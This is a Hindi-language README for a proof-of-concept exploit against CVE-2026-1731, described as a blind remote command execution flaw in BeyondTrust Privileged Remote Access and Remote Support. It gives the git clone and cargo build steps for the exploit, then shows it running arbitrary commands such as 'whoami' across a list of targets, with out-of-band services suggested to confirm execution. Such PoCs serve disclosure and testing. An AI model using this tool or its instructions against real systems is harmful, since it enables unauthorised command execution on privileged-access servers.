
CVE-2026-1731 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, BeyondTrust Privileged Remote Access और Remote Support में एक ब्लाइंड RCE, जो कमजोर संस्करणों पर रिमोट कमांड निष्पादन की अनुमति देता है।
अधिक जानकारी के लिए मैं attackerkb.com द्वारा किया गया विश्लेषण पढ़ने की सलाह देता हूँ।
इस PoC को बनाने के लिए आपको निम्नलिखित टूल्स की आवश्यकता होगी: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 बाइनरी target/release में स्थित होगाcd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
आप उपलब्ध विकल्पों की सूची देखने के लिए ./CVE-2026-1731 -h चला सकते हैं
./CVE-2026-1731 --targets targets.txt --command "whoami"
नोट: चूंकि CVE-2026-1731 एक ब्लाइंड RCE है, इसलिए होस्ट से कोई प्रतिक्रिया वापस नहीं भेजी जाती जिसे भेद्यता के संकेतक के रूप में उपयोग किया जा सके। एक अनुरोध सफल हो सकता है लेकिन एक लक्ष्य जो भेद्य नहीं है, RCE ट्रिगर नहीं करेगा। लक्ष्यों के विरुद्ध परीक्षण के लिए webhook.site या PortSwigger's Burp Collaborator जैसी सेवा का उपयोग करने की अनुशंसा की जाती है। इस PoC में सफलता या विफलता इस बात पर आधारित है कि सर्वर स्टेटस कोड 200 के साथ प्रतिक्रिया देता है या नहीं।
GET /get_rdf?comp=sdcust&locale_code=en-us एंडपॉइंट के माध्यम से संस्करण जांच जोड़ें।